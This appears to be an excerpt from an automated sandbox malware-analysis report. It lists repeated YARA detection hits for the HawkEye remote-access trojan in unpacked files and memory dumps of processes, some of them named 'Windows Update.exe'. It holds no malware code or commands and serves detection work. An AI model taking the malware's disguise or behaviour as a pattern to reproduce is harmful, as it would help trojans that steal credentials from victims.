          Source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4aedc72.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4aedc72.13.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a26c92.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a26c92.27.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4aadc72.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4aadc72.31.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.415513797.0000000005980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000014.00000002.415513797.0000000005980000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
